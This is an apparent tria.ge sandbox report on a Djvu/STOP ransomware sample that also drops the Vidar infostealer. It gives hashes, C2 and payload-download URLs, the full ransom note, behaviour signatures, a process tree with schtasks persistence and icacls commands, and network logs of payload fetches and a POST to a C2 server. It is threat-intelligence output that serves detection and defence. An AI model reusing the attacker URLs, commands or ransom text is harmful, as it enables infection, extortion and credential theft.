Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

dridex

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/07/2023, 12:15 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe

  • Size

    812KB

  • MD5

    73ecaf10be2b83a9a1e77d3235865eac

  • SHA1

    3236e7d9b443a757dbc4dcf902d78c2f8dfaebed

  • SHA256

    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd

  • SHA512

    b2c9df901501146d740c0449d3424f2782307463cb5743ca5d03db2714e6d0291d7c66b9b85c55ab4f14a975ae4da429218fbc3bf41cf2f9747a6f3aaca28988

  • SSDEEP

    12288:2LQHLjpgE7N1EqephL/prRX54Svv9otwos0CBre7/6eai0Ir7FO:jfSExZephLVRWSv9obsxVhXIPFO

Score
10/10
djvuvidarhttps://t.me/eagl3zdiscoverypersistenceransomwarespywarestealer

Malware Config

Extracted

Family

djvu

C2

http://zexeq.com/raud/get.php

Attributes
  • extension

    .miqe

  • offline_id

    1S27jnaC9TYNiwf9VvJvIx5XCXvgyoDAUXHnu0t1

  • payload_url

    http://colisumy.com/dl/build2.exe

    http://zexeq.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-nSxayRgUNO Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0746Pokj

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAukXugPTesVa0dtaWNiiu
3
4WMemiJx4CJUEs31fQDvf3FsFaYPbh9w3XBnaye01J8sv2OBu/6x+PnFoEgf32Ae
4
jUlsScweikBv6CaF//njiz9RaWBWvoxi/G7mSGGEnT64gMDw2werxlov8rdkm6yH
5
ASSmUH0Lv3tfuQNAlhAXHB3HtdCVA8l2OID2mf2bFCeMVBavvp/bcBtZknAWicEl
6
dkHfJMJ0Dt92Pj96zQzNLWPXaR4FCtu44xLSPOsEML6CbYqIjlnMVYHThwLeTeCU
7
s6Of9HYSNQPsWgN8fNnoJo0rsOqcEFVgrKdCr4wsUdqkAZ0qFVSE3yL+DV0jgWt2
8
BQIDAQAB
9
-----END PUBLIC KEY-----

Extracted

Family

vidar

Version

4.7

Botnet

https://t.me/eagl3z

C2

https://t.me/eagl3z

https://steamcommunity.com/profiles/76561199159550234
Attributes
  • profile_id_v2

    https://t.me/eagl3z

  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq

Signatures

  • Detected Djvu ransomware 17 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:1176
    • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
      "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe"
      2⤵
      • Checks computer location settings
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:540
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\211697e2-eae8-42ec-8785-08c77492616d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        3⤵
        • Modifies file permissions
        PID:2740
      • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
        "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe" --Admin IsNotAutoStart IsNotTask
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3908
        • C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
          "C:\Users\Admin\AppData\Local\Temp\c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe" --Admin IsNotAutoStart IsNotTask
          4⤵
          • Checks computer location settings
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5008
          • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
            "C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4596
            • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe
              "C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build2.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:908
          • C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe
            "C:\Users\Admin\AppData\Local\2204781c-229b-46c5-af25-4f4f30ce3f7b\build3.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2104
            • C:\Windows\SysWOW64\schtasks.exe
              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
              6⤵
              • Creates scheduled task(s)
              PID:1040
  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:2832
    • C:\Windows\SysWOW64\schtasks.exe
      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
      2⤵
      • Creates scheduled task(s)
      PID:5040

Network

  • flag-us
    DNS
    126.50.247.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    126.50.247.8.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.136.104.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.136.104.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    api.2ip.ua
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    8.8.8.8:53
    Request
    api.2ip.ua
    IN A
    Response
    api.2ip.ua
    IN A
    162.0.217.254
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Sun, 16 Jul 2023 12:15:40 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    254.217.0.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.217.0.162.in-addr.arpa
    IN PTR
    Response
    254.217.0.162.in-addr.arpa
    IN PTR
    nondutiable-rshinitrdns web-hostingcom
  • flag-us
    DNS
    101.14.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    101.14.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    101.15.18.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    101.15.18.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    208.194.73.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    208.194.73.20.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    https://api.2ip.ua/geo.json
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    162.0.217.254:443
    Request
    GET /geo.json HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: api.2ip.ua
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Sun, 16 Jul 2023 12:15:52 GMT
    Server: Apache
    Strict-Transport-Security: max-age=63072000; preload
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block; report=...
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
    Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
    Upgrade: h2,h2c
    Connection: Upgrade
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    colisumy.com
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    8.8.8.8:53
    Request
    colisumy.com
    IN A
    Response
    colisumy.com
    IN A
    189.245.23.185
    colisumy.com
    IN A
    211.171.233.126
    colisumy.com
    IN A
    201.124.98.97
    colisumy.com
    IN A
    123.140.161.243
    colisumy.com
    IN A
    211.53.230.67
    colisumy.com
    IN A
    220.82.134.215
    colisumy.com
    IN A
    151.251.31.98
    colisumy.com
    IN A
    154.182.153.162
    colisumy.com
    IN A
    189.232.51.144
    colisumy.com
    IN A
    80.210.25.252
  • flag-mx
    GET
    http://colisumy.com/dl/build2.exe
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    189.245.23.185:80
    Request
    GET /dl/build2.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: colisumy.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 16 Jul 2023 12:15:53 GMT
    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
    Last-Modified: Mon, 10 Jul 2023 14:24:53 GMT
    ETag: "6fc00-60022bf0382f8"
    Accept-Ranges: bytes
    Content-Length: 457728
    Connection: close
    Content-Type: application/octet-stream
  • flag-us
    DNS
    zexeq.com
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    8.8.8.8:53
    Request
    zexeq.com
    IN A
    Response
    zexeq.com
    IN A
    196.188.169.138
    zexeq.com
    IN A
    187.156.105.40
    zexeq.com
    IN A
    109.175.29.39
    zexeq.com
    IN A
    62.217.232.10
    zexeq.com
    IN A
    201.119.15.212
    zexeq.com
    IN A
    190.219.153.101
    zexeq.com
    IN A
    190.187.52.42
    zexeq.com
    IN A
    211.40.39.251
    zexeq.com
    IN A
    211.171.233.129
    zexeq.com
    IN A
    222.236.49.123
  • flag-et
    GET
    http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    196.188.169.138:80
    Request
    GET /raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: zexeq.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 16 Jul 2023 12:15:53 GMT
    Server: Apache/2.4.37 (Win64) PHP/5.6.40
    X-Powered-By: PHP/5.6.40
    Content-Length: 563
    Connection: close
    Content-Type: text/html; charset=UTF-8
  • flag-us
    DNS
    185.23.245.189.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    185.23.245.189.in-addr.arpa
    IN PTR
    Response
    185.23.245.189.in-addr.arpa
    IN PTR
    host-185-23-static-245-189 uninet-idecommx
  • flag-us
    DNS
    138.169.188.196.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    138.169.188.196.in-addr.arpa
    IN PTR
    Response
  • flag-et
    GET
    http://zexeq.com/files/1/build3.exe
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    Remote address:
    196.188.169.138:80
    Request
    GET /files/1/build3.exe HTTP/1.1
    User-Agent: Microsoft Internet Explorer
    Host: zexeq.com
    Response
    HTTP/1.1 200 OK
    Date: Sun, 16 Jul 2023 12:15:56 GMT
    Server: Apache/2.4.37 (Win64) PHP/5.6.40
    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
    ETag: "2600-5c86757379380"
    Accept-Ranges: bytes
    Content-Length: 9728
    Connection: close
    Content-Type: application/x-msdownload
  • flag-us
    DNS
    t.me
    build2.exe
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/eagl3z
    build2.exe
    Remote address:
    149.154.167.99:443
    Request
    GET /eagl3z HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
    Host: t.me
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sun, 16 Jul 2023 12:15:58 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12323
    Connection: keep-alive
    Set-Cookie: stel_ssid=37db46294837fb98ba_1894581439611601703; expires=Mon, 17 Jul 2023 12:15:58 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-de
    GET
    http://128.140.92.122:8081/cbd613607c301b91658bcf8a9e38cc6a
    build2.exe
    Remote address:
    128.140.92.122:8081
    Request
    GET /cbd613607c301b91658bcf8a9e38cc6a HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
    Host: 128.140.92.122:8081
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Jul 2023 12:15:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    http://128.140.92.122:8081/files.zip
    build2.exe
    Remote address:
    128.140.92.122:8081
    Request
    GET /files.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
    Host: 128.140.92.122:8081
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Jul 2023 12:15:58 GMT
    Content-Type: application/zip
    Content-Length: 2685679
    Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
    Connection: keep-alive
    ETag: "631f30d3-28faef"
    Accept-Ranges: bytes
  • flag-de
    POST
    http://128.140.92.122:8081/
    build2.exe
    Remote address:
    128.140.92.122:8081
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----7708045882433214
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1788.0 uacq
    Host: 128.140.92.122:8081
    Content-Length: 157337
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Sun, 16 Jul 2023 12:16:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    22.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.249.124.192.in-addr.arpa
    IN PTR
    Response
    22.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10022sucurinet
  • flag-us
    DNS
    122.92.140.128.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    122.92.140.128.in-addr.arpa
    IN PTR
    Response
    122.92.140.128.in-addr.arpa
    IN PTR
    static12292140128clients your-serverde
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    254.109.26.67.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    254.109.26.67.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    63.13.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    63.13.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    202.74.101.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    202.74.101.95.in-addr.arpa
    IN PTR
    Response
    202.74.101.95.in-addr.arpa
    IN PTR
    a95-101-74-202deploystaticakamaitechnologiescom
  • flag-us
    DNS
    5.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    5.173.189.20.in-addr.arpa
    IN PTR
    Response
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    1.0kB
     8.1kB
     14
    10

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 162.0.217.254:443
    https://api.2ip.ua/geo.json
    tls, http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    1.2kB
     8.2kB
     17
    12

    HTTP Request

    GET https://api.2ip.ua/geo.json

    HTTP Response

    429
  • 189.245.23.185:80
    http://colisumy.com/dl/build2.exe
    http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    16.0kB
     471.8kB
     345
    344

    HTTP Request

    GET http://colisumy.com/dl/build2.exe

    HTTP Response

    200
  • 196.188.169.138:80
    http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true
    http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    412 B
     979 B
     6
    5

    HTTP Request

    GET http://zexeq.com/raud/get.php?pid=94E1BC88C047D2BC5A0CD5F3E0382D82&first=true

    HTTP Response

    200
  • 196.188.169.138:80
    http://zexeq.com/files/1/build3.exe
    http
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    692 B
     10.5kB
     13
    12

    HTTP Request

    GET http://zexeq.com/files/1/build3.exe

    HTTP Response

    200
  • 149.154.167.99:443
    https://t.me/eagl3z
    tls, http
    build2.exe
    1.5kB
     19.4kB
     24
    20

    HTTP Request

    GET https://t.me/eagl3z

    HTTP Response

    200
  • 128.140.92.122:8081
    http://128.140.92.122:8081/
    http
    build2.exe
    269.4kB
     2.8MB
     2119
    2064

    HTTP Request

    GET http://128.140.92.122:8081/cbd613607c301b91658bcf8a9e38cc6a

    HTTP Response

    200

    HTTP Request

    GET http://128.140.92.122:8081/files.zip

    HTTP Response

    200

    HTTP Request

    POST http://128.140.92.122:8081/

    HTTP Response

    200
  • 8.8.8.8:53
    126.50.247.8.in-addr.arpa
    dns
    71 B
     125 B
     1
    1

    DNS Request

    126.50.247.8.in-addr.arpa

  • 8.8.8.8:53
    2.136.104.51.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    2.136.104.51.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    api.2ip.ua
    dns
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    56 B
     72 B
     1
    1

    DNS Request

    api.2ip.ua

    DNS Response

    162.0.217.254

  • 8.8.8.8:53
    254.217.0.162.in-addr.arpa
    dns
    72 B
     126 B
     1
    1

    DNS Request

    254.217.0.162.in-addr.arpa

  • 8.8.8.8:53
    101.14.18.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    101.14.18.104.in-addr.arpa

  • 8.8.8.8:53
    101.15.18.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    101.15.18.104.in-addr.arpa

  • 8.8.8.8:53
    208.194.73.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    208.194.73.20.in-addr.arpa

  • 8.8.8.8:53
    colisumy.com
    dns
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    58 B
     218 B
     1
    1

    DNS Request

    colisumy.com

    DNS Response

    189.245.23.185
    211.171.233.126
    201.124.98.97
    123.140.161.243
    211.53.230.67
    220.82.134.215
    151.251.31.98
    154.182.153.162
    189.232.51.144
    80.210.25.252

  • 8.8.8.8:53
    zexeq.com
    dns
    c5e7f5887687af0628996b7c11e5607d79ad6868aabe4aacdf3f9664ad89badd.exe
    55 B
     215 B
     1
    1

    DNS Request

    zexeq.com

    DNS Response

    196.188.169.138
    187.156.105.40
    109.175.29.39
    62.217.232.10
    201.119.15.212
    190.219.153.101
    190.187.52.42
    211.40.39.251
    211.171.233.129
    222.236.49.123

  • 8.8.8.8:53
    185.23.245.189.in-addr.arpa
    dns
    73 B
     131 B
     1
    1

    DNS Request

    185.23.245.189.in-addr.arpa

  • 8.8.8.8:53
    138.169.188.196.in-addr.arpa
    dns
    74 B
     135 B
     1
    1

    DNS Request

    138.169.188.196.in-addr.arpa

  • 8.8.8.8:53
    t.me
    dns
    build2.exe
    50 B
     66 B
     1
    1

    DNS Request

    t.me

    DNS Response

    149.154.167.99

  • 8.8.8.8:53
    99.167.154.149.in-addr.arpa
    dns
    73 B
     166 B
     1
    1

    DNS Request

    99.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    22.249.124.192.in-addr.arpa
    dns
    73 B
     113 B
     1
    1

    DNS Request

    22.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    122.92.140.128.in-addr.arpa
    dns
    73 B
     131 B
     1
    1

    DNS Request

    122.92.140.128.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    254.109.26.67.in-addr.arpa
    dns
    72 B
     126 B
     1
    1

    DNS Request

    254.109.26.67.in-addr.arpa

  • 8.8.8.8:53
    63.13.109.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    63.13.109.52.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    202.74.101.95.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    202.74.101.95.in-addr.arpa

  • 8.8.8.8:53
    5.173.189.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    5.173.189.20.in-addr.arpa

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\mozglue.dll
    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

    Download Submit

  • C:\ProgramData\nss3.dll
    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
    Filesize

    2KB

    MD5

    ec50490b07b4d77ae984e14377e81faf

    SHA1

    74330d98bc1ef271a37b3ae273efcccab1c335be

    SHA256

    30afe1a3bcc9efa0dd4619e272548ef4ecc76817e67e04f69cb83f1e4380d716

    SHA512

    3972532782f05f3d24f6e8e3ab8362dfc2603c24ffe5728404977b4d13f3dc360b76b6ab8056da98845f53d5d12d9d24981d0e6edcc042d0b885114417945c8f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
    Filesize

    1KB

    MD5

    f232260646b9219a0d25be2ba7d3e80f

    SHA1

    748c809b09ab1d39ef17ec453428cbc2449ef7b9

    SHA256

    3217032d47b15ce1c91eb2dc77e765dd9acffb0029756f4dd02ab6c12e0bd65e

    SHA512

    6eb067b352e6920b2fb6981d37ea3e3f59e3b5725a4ca797c34463b6e52e0b9e748d0cf31496b54c989bf7126d55b40d44850b7122f4d9fee3593926c4c6fedb

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
    Filesize

    488B

    MD5

    434e5afc6b8fcaf32d4268bede602cd1

    SHA1

    f74138ecf0bce9599d7ac8d7bfb0a436903a3cca

    SHA256

    3473a4e3a33d9b6d4a1da18ce75c1f975888bd8cf690bbc691b9d9b0912dbfd4

    SHA512

    a9677ee281d03ab449ed55a023d8853c8d0b3e92a566fe8756655794d6c2e279d6015799b6b1446efabe39b2dcbeb5052e1c30b87f875b9bcefaad7bb42f5d14

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
    Filesize

    482B

    MD5

    30632de87da89c70541ff5d50c4f452f

    SHA1

    b39bf51fde8f2c78cfaafa080d9f59fac550784c

    SHA256

    3e57b2d2a3816c5404f830bf579d6ec00bc3713ea3be3d03b7410e5b0da0bd52

    SHA512

